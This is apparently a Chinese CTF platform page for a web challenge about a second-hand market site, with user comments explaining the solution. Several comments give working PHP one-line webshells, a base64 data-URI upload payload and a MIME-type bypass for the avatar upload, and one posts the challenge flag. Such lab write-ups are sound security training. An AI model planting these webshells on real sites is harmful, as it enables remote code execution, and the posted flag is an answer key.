xxx二手交易市场WEB 未解决

分数: 30 金币: 5
题目作者: Aman
一  血: dotast
一血奖励: 5金币
解  决: 2318
提  示:
描  述:
本人现实碰到的题目,无提示勿问
评论
LoadOverload 6天前

用webacoo亦可解决

回复 0

Zhumeng 5月前

注册账号登录用户会有个头像上传上传一个正常的头像发现被base64编码了,我们将一句话木马进行编码编码后上传将mime类型改成image/php

回复 0

zhuohao 6月前

蚁剑一直返回数据为空 一直连不上

回复 0
hackhui 5月前

一句话木马传参加''

回复 0

LLTVLL 7月前

一句话用这个 <?php eval($_POST['cmd']);?>,好像网上找的有的有问题

回复 0

BlueL1ght 1年前

<?php echo `$_POST[a]`;?>

回复 0

Daniel2023 1年前

<?php @eval($_POST['abc']);?> 上传data参数: data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2FPD9waHAgQGV2YWwoJF9QT1NUWydhYmMnXSk7Pz4=

回复 1

vchopin 1年前

base64最后结尾要= 不然bp显示php syntax error,蚁剑连不上

回复 0

XRain 1年前

实战题才好玩,各种黑盒测试,我看到 data://image/jpeg 和保存的图片文件名后缀 jpeg,就猜想这两个 jpeg 是不是有关联,一测发现果然有。

回复 0

不会编程的崽 1年前

我不理解,POST['a'],死活连不上,POST['attack']就可以。。。。。

回复 0

三碗不过杠 1年前

flag{fd71260e4d41df49807229647056e7dd} 头像处文件上传,抓包base64编码写入一句话木马,上传蚁剑链接,重点就是改php,base

回复 1

WriteUp

image
nic016

5 金币

评分(10)

解题动态

DK. 攻破了该题 3天前
小坑西1 攻破了该题 3天前
forces 攻破了该题 5天前
LoadOverload 攻破了该题 6天前
pezn1and 攻破了该题 6天前
rushhz 攻破了该题 7天前
18715507793 攻破了该题 8天前
jiayouya 攻破了该题 8天前
不上早八 攻破了该题 9天前
bugkuwo 攻破了该题 10天前
18897888104 攻破了该题 10天前
yht111 攻破了该题 11天前
19933663636 攻破了该题 12天前
15606064698 攻破了该题 13天前
zjl182 攻破了该题 13天前
花落时相遇 攻破了该题 13天前
a5580990 攻破了该题 14天前
刘刘 攻破了该题 15天前
pcxu 攻破了该题 16天前
ct1640 攻破了该题 16天前
问题反馈